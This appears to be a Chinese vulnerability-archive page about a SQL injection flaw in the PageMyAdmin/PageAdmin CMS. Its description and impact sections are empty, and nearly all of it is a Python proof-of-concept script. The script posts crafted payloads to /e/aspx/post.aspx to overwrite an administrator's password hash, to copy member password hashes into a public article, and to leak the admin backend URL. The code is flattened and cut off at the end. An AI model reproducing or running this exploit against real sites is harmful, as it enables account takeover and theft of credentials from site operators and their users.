PageMyAdmin_sql注入漏洞

# PageMyAdmin sql注入漏洞

=======================

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

### poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib2
import urllib
import re
import sys

def main():
url=sys.argv[1]+”/e/aspx/post.aspx”
fun=sys.argv[2]
if fun==’upass’:
update(url)
elif fun==’sqlinject’:
sqlinject(url)
elif fun==’Backstage’:
Backstage(url)
else:
print”’
usage: pageadminsql.py http://www.baidu.com/ upass
parameter: uppass sqlinject Backstage
”’
def update(url):
headers = {“User-Agent”:”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0″,”Referer”:url+”?a=pageadmin_cms”}
formate={
“siteid”:”1″,
“formtable”:”1″,
“thedata”:'[u][k]pa_member[k][s][k]userpassword=”1527f10a11de5efea4b8516213413c103df55126″[k]where[k]id=2′
}
postdata = urllib.urlencode(formate)
request = urllib2.Request(url, data=postdata, headers = headers)
try:
response = urllib2.urlopen(request)
if response.getcode()==200:
print u”>>>>>>修改密码成功 修改密码:admin_1234213<<<<<<" pass except Exception as e: print u">>>>>>修改密码失败<<<<<<" pass def sqlinject(url): headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"} formate={ "siteid":"1", "formtable":"1", "thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747" } postdata = urllib.urlencode(formate) request = urllib2.Request(url, data=postdata, headers = headers) try: response = urllib2.urlopen(request) if response.getcode()==200: print u">>>>>>密码注入成功 查看密码地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1]) pass except Exception as e: print u">>>>>>密码注入失败<<<<<<" pass def Backstage(url): headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"} formate={ "siteid":"1", "formtable":"1", "thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747" } postdata = urllib.urlencode(formate) request = urllib2.Request(url, data=postdata, headers = headers) try: response = urllib2.urlopen(request) if response.getcode()==200: print u">>>>>>后台地址注入成功 查看后台地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1]) pass except Exception as e: print u">>>>>>后台地址注入失败<<<<<<" pass if __name__ == '__main__': main(

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容